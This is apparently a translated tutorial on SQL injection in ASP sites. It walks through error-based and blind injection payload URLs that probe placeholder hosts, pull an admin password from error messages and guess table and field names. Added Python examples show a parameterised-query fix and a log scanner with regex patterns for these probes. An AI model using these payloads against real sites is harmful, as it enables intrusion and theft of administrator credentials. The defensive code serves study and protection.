Causes of website Scripting Vulnerabilities

Source: Internet
Author: User

With the recovery of the Internet economy, more and more websites are appearing, and as script vulnerabilities keep being discovered, attackers are becoming more rampant, younger and less skilled. "You only need a tool to hack a site" is the hallmark of script vulnerabilities. The main cause of these vulnerabilities is the skill of the programmers: when writing ASP or PHP programs they do not filter input characters strictly, do not understand injection vulnerabilities, or simply miss a check on a parameter.

The entry threshold for writing web programs is not high, and the level and experience of programmers vary widely. A considerable number of programmers do not check the legitimacy of user input when writing code, which puts the application at risk: a user can submit a piece of database query code and, from the results the program returns, obtain the data they want. This is called SQL injection.

Let's take an example. Suppose an IIS-based ASP page http://localhost/test/show.asp?ID=3 exists on the local machine. After the URL is submitted, the server runs a query built like "Select * from tablename where field=" & ID (ID is the parameter submitted by the client, here 3) and returns the result to the client. If the client deliberately submits the URL http://localhost/test/show.asp?ID=3 and user>0, the server runs a query such as Select * from tablename where field=444 and user>0. Of course this statement cannot run, and the error message is as follows:

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'test' to a column of data type int.
/test/show.asp, line 34

From this error message we learn that the site uses an MSSQL database over an ODBC connection, and that the connection account name is test. SQL injection, then, exploits the programmer's lax or missing checks on the legality of user input: special code is deliberately submitted from the client to collect information about the program and the server, and ultimately the data the attacker is after. Usually the goal is the website administrator's account and password. For example, if you know that the administrator accounts are stored in the table login, that the administrator account name is admin, and you want to know the admin password, you can submit the following URL from the client:
http://localhost/test/show.asp?ID=4 and (Select password from login where user_name='admin')>0

The error message returned is as follows:

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 'admin888' to a column of data type int.
/test/show.asp, line 34

Now "admin888" is the administrator's password, and with this account and password the website can be taken over. Of course, one usually does not know that the accounts are in the table login or that the administrator is named admin, but that is not a real obstacle: a tool can be written to guess them, and it quickly finds what it is looking for. The above is the basis of MSSQL database injection. Now let's look at the basics of Access database injection. First, configure the browser so that error information is returned during manual injection. The procedure is: right-click the browser icon, select "Properties", open the "Advanced" tab in the dialog box, clear the check box "Show friendly HTTP error messages" and click "Apply".
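The pattern in the show.asp example above, shown as an added example that is not from the original article: the concatenated query beside a hardened version that validates the ID and binds it as a parameter. It uses Python with an in-memory SQLite table as a stand-in for the ASP page and MSSQL; the table, its rows and the function names are constructed.

```python
import sqlite3

# Constructed stand-in for the page's "Select * from tablename where field=" & ID
# pattern: SQLite in memory replaces SQL Server, the table and rows are made up.
def _setup():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO articles VALUES (?, ?)",
                    [(3, "hello"), (4, "world")])
    return con

def show_vulnerable(con, id_param):
    # The client-controlled ID is spliced straight into the SQL text, as in show.asp,
    # so "3 and 1=2" becomes part of the WHERE clause instead of a value.
    sql = "SELECT id, title FROM articles WHERE id=" + id_param
    return con.execute(sql).fetchall()

def show_hardened(con, id_param):
    # 1) Validate: the parameter must be an integer and nothing else.
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("ID must be an integer") from None
    # 2) Bind it as a parameter; the database never sees it as SQL text.
    sql = "SELECT id, title FROM articles WHERE id=?"
    return con.execute(sql, (id_value,)).fetchall()

def demo():
    # Run both versions against a normal ID and against the "and 1=1" / "and 1=2"
    # probes the article describes, and report what each one returns.
    con = _setup()
    results = {}
    results["vuln_normal"] = show_vulnerable(con, "3")
    results["vuln_true"] = show_vulnerable(con, "3 and 1=1")   # same rows as normal
    results["vuln_false"] = show_vulnerable(con, "3 and 1=2")  # empty: the tell-tale difference
    results["hard_normal"] = show_hardened(con, "3")
    try:
        show_hardened(con, "3 and 1=2")
        results["hard_injected"] = "accepted"
    except ValueError:
        results["hard_injected"] = "rejected"  # the probe never reaches the database
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The vulnerable version answers the two probes differently, which is exactly the signal the article's 1=1 / 1=2 test relies on; the hardened version gives the attacker nothing to compare.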

For SQL injection you must first find an injection point. The usual test is this: take a URL of the form http://www.xxx.com/xxx.asp?id=xx and append a single quotation mark, giving http://www.xxx.com/xxx.asp?id=xx'.

If an error message appears, there may be an injection vulnerability. Next, enter http://www.xxx.com/xxx.asp?id=xx and 1=1. If the SQL injection vulnerability exists, the condition is passed to the database; since 1=1 is always true it changes nothing, so a normal page is returned, the same as for http://www.xxx.com/xxx.asp?id=xx. At this point the intruder judges that the site can probably be injected. If an error is returned instead, some beginners give up on the site. The intruder then submits http://www.xxx.com/xxx.asp?id=xx and 1=2; 1=2 is always false, and if the site passes the condition to the database, information such as the following is returned:

Microsoft VBScript compilation error '800a03f6'

Expected 'End'

/iisHelp/common/500-100.asp, line 242

ADODB.Field error '800a0bcd'

If the preceding information is displayed, the SQL injection vulnerability exists. The following is an analysis of the SQL Injection Process:

For example, open http://hostlocal/test2/list.asp?id=17 and append a single quote: http://hostlocal/test2/list.asp?id=17'
An error is displayed, shown as "database error". Next, we perform the following steps:

1. Guess the Administrator account table.
2. Guess the user field name and password field name in the table.
3. Guess the username length and password length.
4. Guess the user name and password.
5. Go to the Management page.

Guess the administrator table:

http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin)   // min(id) returns the smallest id in the table
If the page returns the article, the admin table exists. If no article is returned, the admin table does not exist.

Guess the user field name:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where user='aaa') returns an error message, indicating that the field name "user" does not exist.
Try again: http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where username='aaa')
No error message is returned, and no article is returned either; the page says the article cannot be found. This indicates that admin has a username field, but the user name is not aaa.

Guess the password field name:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where passwd='aaa') returns an error message, indicating that the password field name is not passwd.

Next: http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where password='aaa') returns no error message and no article, prompting that the article cannot be found. The password field exists in admin, but the password is not aaa.

Guess the length of the user name:

http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)>5)
Correct
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)<10)
Correct
The user name length is greater than 5 and less than 10.
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)=7)
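The probing sequence walked through above leaves a recognisable trail in the web server log. As an added example that is not part of the original article, here is a small Python scanner that flags the probe shapes described (trailing single quote, and 1=1 / and 1=2, and 1=(select ...), len(...)) in IIS-style log lines. The log lines are constructed, and the field layout is assumed to be date time method uri-stem uri-query status.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method uri-stem uri-query status);
# the paths mirror the article's list.asp example, everything else is made up.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /test2/list.asp id=17 200
2024-01-01 10:00:02 GET /test2/list.asp id=17' 500
2024-01-01 10:00:03 GET /test2/list.asp id=17%20and%201=1 200
2024-01-01 10:00:04 GET /test2/list.asp id=17%20and%201=2 500
2024-01-01 10:00:05 GET /test2/list.asp id=17+and+1=(select+min(id)+from+admin+where+len(username)>5) 200
2024-01-01 10:00:06 GET /news.asp page=2 200
"""

# Each rule names one probe shape from the injection walk-through above.
PROBE_RULES = [
    ("quote-probe", re.compile(r"=\s*\w+'\s*$")),         # value followed by a single quote
    ("tautology", re.compile(r"\band\s+1\s*=\s*[12]\b")),  # and 1=1 / and 1=2
    ("subselect", re.compile(r"\(\s*select\b")),           # and 1=(select min(id) ...)
    ("len-probe", re.compile(r"\blen\s*\(")),              # len(username) > N
]

def normalise_query(raw):
    # Decode %xx and '+' encodings, collapse whitespace and lowercase, so that
    # encoded variants of the same probe match the same rule.
    return re.sub(r"\s+", " ", unquote_plus(raw)).strip().lower()

def scan_log(text):
    # Return (time, uri-stem, status, [matched rules]) for every suspicious request.
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed or truncated line
        _date, time, _method, stem, query, status = parts[:6]
        q = normalise_query(query)
        matched = [name for name, rx in PROBE_RULES if rx.search(q)]
        if matched:
            hits.append((time, stem, status, matched))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A run of quote-probe, tautology and subselect hits against one page from one client within a short window is the pattern to alert on; a single hit is often just a typo.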
